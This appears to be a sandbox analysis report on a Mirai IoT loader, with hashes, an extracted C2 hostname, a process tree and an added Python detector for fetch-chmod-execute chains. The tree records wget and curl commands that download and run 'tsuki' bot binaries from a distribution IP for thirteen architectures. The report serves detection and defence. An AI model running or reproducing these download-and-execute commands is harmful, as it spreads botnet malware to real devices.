Analysis

max time kernel: 37s
max time network: 65s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 22-07-2024 00:17
Static task: static1

Behavioral task: behavioral1
  Sample: 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
  Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
  Sample: 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
  Resource: debian9-armhf-20240611-en

Behavioral task: behavioral3
  Sample: 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
  Resource: debian9-mipsbe-20240418-en
General

Target: 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Size: 2KB
MD5: 0cfdd05ea2bb11d74b3ce3b95fc29421
SHA1: 665cc6ba414b286da9c1a41a618d843275fa53cc
SHA256: 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
SHA512: 8a0baf4405ad2462a4a735d4a2a84d8d0b9ef10b72261716e0afb985f280d93aac4f5e8e40a6da0d330264813a077f3a4216df862821022d2f9c3ea90147c120
Malware Config

Extracted (the same configuration was recovered in behavioral1, behavioral2 and behavioral3)
mirai
MIRAI
whois.hopto.org

Note: whois.hopto.org is a dynamic-DNS hostname (hopto.org is a No-IP domain), so the address behind it can change at any time; block and hunt on the hostname rather than on whatever IP it resolved to during the run. The binaries themselves are fetched from 176.123.2.219 (see Processes); whether that host is also what whois.hopto.org resolved to is not recorded on this page.
Signatures

Executes dropped EXE (13 IoCs)
Process /tmp/tsuki (name: tsuki), executed as PIDs 701, 733, 763, 780, 793, 807, 816, 824, 830, 838, 843, 848 and 854.
Checks CPU configuration (1 TTP, 13 IoCs)
Checks CPU information which can indicate whether the system is a virtual machine.
File opened for reading: /proc/cpuinfo, by curl (13 times, once per download round).

Caveat: every one of these hits is from curl, a stock system utility, not from the dropper script or the dropped tsuki binary. Reading /proc/cpuinfo at start-up is ordinary CPU-feature probing by the libraries curl links against, so this signature is not evidence of sandbox-evasion logic in the sample.
Reads runtime system information (26 IoCs)
Reads data from /proc virtual filesystem.
File opened for reading: /proc/sys/crypto/fips_enabled, by curl (13 times)
File opened for reading: /proc/self/auxv, by curl (13 times)
Writes file to tmp directory (22 IoCs)
Malware often drops required files in the /tmp directory.
File opened for modification by wget (8): /tmp/tsuki.x86, /tmp/tsuki.mips, /tmp/tsuki.mpsl, /tmp/tsuki.arm, /tmp/tsuki.arm7, /tmp/tsuki.ppc, /tmp/tsuki.m68k, /tmp/tsuki.sh4
File opened for modification by curl (13): /tmp/tsuki.x86, /tmp/tsuki.mips, /tmp/tsuki.mpsl, /tmp/tsuki.arm, /tmp/tsuki.arm5, /tmp/tsuki.arm6, /tmp/tsuki.arm7, /tmp/tsuki.ppc, /tmp/tsuki.m68k, /tmp/tsuki.spc, /tmp/tsuki.i686, /tmp/tsuki.sh4, /tmp/tsuki.arc
File opened for modification by 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae (1): /tmp/tsuki
Processes

[PID 668] /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae: /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
- Writes file to tmp directory

Children of PID 668, in launch order (one download round per architecture build):

  [PID 670] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.x86
  - Writes file to tmp directory
  [PID 697] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.x86
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 698] /bin/cat: cat tsuki.x86
  [PID 700] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.x86
  [PID 701] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 705] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.mips
  - Writes file to tmp directory
  [PID 720] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.mips
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 730] /bin/cat: cat tsuki.mips
  [PID 731] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.mips tsuki.x86
  [PID 733] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 736] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.mpsl
  - Writes file to tmp directory
  [PID 752] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.mpsl
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 761] /bin/cat: cat tsuki.mpsl
  [PID 762] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.mips tsuki.mpsl tsuki.x86
  [PID 763] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 765] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.arm
  - Writes file to tmp directory
  [PID 766] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.arm
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 777] /bin/cat: cat tsuki.arm
  [PID 778] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86
  [PID 780] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 781] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.arm5
  [PID 785] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.arm5
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 790] /bin/cat: cat tsuki.arm5
  [PID 791] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86
  [PID 793] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 794] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.arm6
  [PID 800] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.arm6
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 804] /bin/cat: cat tsuki.arm6
  [PID 806] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86
  [PID 807] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 808] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.arm7
  - Writes file to tmp directory
  [PID 813] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.arm7
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 814] /bin/cat: cat tsuki.arm7
  [PID 815] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86
  [PID 816] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 817] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.ppc
  - Writes file to tmp directory
  [PID 818] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.ppc
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 819] /bin/cat: cat tsuki.ppc
  [PID 821] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86
  [PID 824] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 826] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.m68k
  - Writes file to tmp directory
  [PID 827] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.m68k
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 828] /bin/cat: cat tsuki.m68k
  [PID 829] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86
  [PID 830] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 832] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.spc
  [PID 835] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.spc
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 836] /bin/cat: cat tsuki.spc
  [PID 837] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86
  [PID 838] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 839] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.i686
  [PID 840] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.i686
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 841] /bin/cat: cat tsuki.i686
  [PID 842] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86
  [PID 843] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 844] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.sh4
  - Writes file to tmp directory
  [PID 845] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.sh4
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 846] /bin/cat: cat tsuki.sh4
  [PID 847] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86
  [PID 848] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE

  [PID 850] /usr/bin/wget: wget http://176.123.2.219/bins/tsuki.arc
  [PID 851] /usr/bin/curl: curl -O http://176.123.2.219/bins/tsuki.arc
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  [PID 852] /bin/cat: cat tsuki.arc
  [PID 853] /bin/chmod: chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86
  [PID 854] /tmp/tsuki: ./tsuki payload
  - Executes dropped EXE
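The tree above is the standard multi-architecture IoT loader loop. For each of thirteen builds (x86, mips, mpsl, arm, arm5, arm6, arm7, ppc, m68k, spc, i686, sh4, arc) the 2 KB script fetches http://176.123.2.219/bins/tsuki.<arch> with both wget and curl -O, runs cat on the result (any redirect is not visible in the tree), runs chmod +x over everything in /tmp (the argument list is simply /tmp's directory listing, unrelated systemd-private directory included) and then executes ./tsuki payload. That loop is why Executes dropped EXE fires thirteen times, and it is the behaviour worth detecting generically rather than by hash: the binaries change, the fetch-chmod-exec shape from a scratch directory does not.

The following is an added example, not part of the sandbox report and not code from the loader: a small detector plus IoC extractor that works over process events in the shape the tree shows. EVENTS is a constructed transcription of three of the rounds (chmod argument lists abbreviated; the arm5 round is included because its wget is not flagged as writing a file while curl -O is). The function names, the DOWNLOADERS and WRITABLE_DIRS sets, and the assumption that PID order equals launch order are mine.

```python
import os
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed input (not sandbox output): (pid, ppid, exe, cmdline) tuples
# transcribed from three of the thirteen download rounds in the process tree.
# The tree puts every child at the same depth under the dropper, so ppid is
# 668 throughout. chmod argument lists are abbreviated.
DROPPER = "/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae"
EVENTS = [
    (668, 1, DROPPER, DROPPER),
    (670, 668, "/usr/bin/wget", "wget http://176.123.2.219/bins/tsuki.x86"),
    (697, 668, "/usr/bin/curl", "curl -O http://176.123.2.219/bins/tsuki.x86"),
    (698, 668, "/bin/cat", "cat tsuki.x86"),
    (700, 668, "/bin/chmod", "chmod +x tsuki tsuki.x86"),
    (701, 668, "/tmp/tsuki", "./tsuki payload"),
    (705, 668, "/usr/bin/wget", "wget http://176.123.2.219/bins/tsuki.mips"),
    (720, 668, "/usr/bin/curl", "curl -O http://176.123.2.219/bins/tsuki.mips"),
    (730, 668, "/bin/cat", "cat tsuki.mips"),
    (731, 668, "/bin/chmod", "chmod +x tsuki tsuki.mips tsuki.x86"),
    (733, 668, "/tmp/tsuki", "./tsuki payload"),
    (781, 668, "/usr/bin/wget", "wget http://176.123.2.219/bins/tsuki.arm5"),
    (785, 668, "/usr/bin/curl", "curl -O http://176.123.2.219/bins/tsuki.arm5"),
    (790, 668, "/bin/cat", "cat tsuki.arm5"),
    (791, 668, "/bin/chmod", "chmod +x tsuki tsuki.arm5 tsuki.mips tsuki.x86"),
    (793, 668, "/tmp/tsuki", "./tsuki payload"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Assumed sets: fetch tools typical of IoT loaders, and world-writable
# directories from which nothing legitimate should normally be executed.
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def find_dropper_chains(events):
    """Flag fetch -> chmod +x -> execute-from-scratch-directory sequences.

    Children of each parent are walked in PID order (assumed to be launch
    order, which matches the tree). A finding is emitted when a process whose
    executable lives in a scratch directory starts after at least one fetch
    and one chmod +x under the same parent; state then resets, so every
    download round yields exactly one finding.
    """
    by_parent = defaultdict(list)
    for ev in sorted(events):
        by_parent[ev[1]].append(ev)

    findings = []
    for ppid, children in by_parent.items():
        urls, chmod_pid = [], None
        for pid, _, exe, cmd in children:
            argv = cmd.split()
            tool = os.path.basename(argv[0]) if argv else ""
            if tool in DOWNLOADERS:
                urls.extend(URL_RE.findall(cmd))
            elif tool == "chmod" and "+x" in argv:
                chmod_pid = pid
            elif exe.startswith(WRITABLE_DIRS) and urls and chmod_pid is not None:
                findings.append({"parent": ppid, "exec_pid": pid, "exe": exe,
                                 "chmod_pid": chmod_pid, "urls": list(urls)})
                urls, chmod_pid = [], None
    return findings


def extract_iocs(events, c2_hosts=()):
    """Collect blockable indicators: fetch URLs, hosts (plus any C2 taken from
    the extracted config), the architecture suffixes tried, and executed paths."""
    chains = find_dropper_chains(events)
    urls = sorted({u for c in chains for u in c["urls"]})
    hosts = sorted({urlparse(u).hostname for u in urls} | set(c2_hosts))
    variants = sorted({urlparse(u).path.rsplit(".", 1)[-1] for u in urls})
    executed = sorted({c["exe"] for c in chains})
    return {"urls": urls, "hosts": hosts, "arch_variants": variants,
            "executed": executed}


if __name__ == "__main__":
    for f in find_dropper_chains(EVENTS):
        print(f"PID {f['exec_pid']} ran {f['exe']} after fetching "
              f"{sorted(set(f['urls']))} (chmod PID {f['chmod_pid']})")
    print(extract_iocs(EVENTS, c2_hosts=("whois.hopto.org",)))
```

The detector keys on attempted fetches, not successful ones, so a round whose wget wrote nothing (arm5 here) still produces a finding and its URL still lands in the IoC list, which is what you want when the distribution server is already down. Feed it the full thirteen rounds and it returns thirteen findings, matching the signature count in the report.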
Network
MITRE ATT&CK Enterprise v15
Downloads

Five distinct versions of /tmp/tsuki were captured across the three behavioral tasks, plus one copy of /tmp/tsuki.x86. The 213 B version is far too small to be a Mirai bot binary; inspect its content before treating its hashes as payload IoCs.

/tmp/tsuki
Filesize: 98KB
MD5: 6cf78b3572c325d809ad4677c2ebd6a2
SHA1: be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256: c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512: bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki
Filesize: 99KB
MD5: 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1: 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256: eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512: 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki
Filesize: 90KB
MD5: 3cd8418ac8f414def6727fe141d328b9
SHA1: dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256: cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512: 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki
Filesize: 213B
MD5: eeed291445ee3e6bac53540dfd6cd91c
SHA1: afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256: 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512: ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki
Filesize: 164KB
MD5: adf30c84e4d1a741bb51593fa750d624
SHA1: ca52225d16c403e9e6ab662e8dab63496281945d
SHA256: 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512: 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846

/tmp/tsuki.x86
Filesize: 76KB
MD5: f60ada8b79c2232773b9c08868c1c5fb
SHA1: 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256: 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512: 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8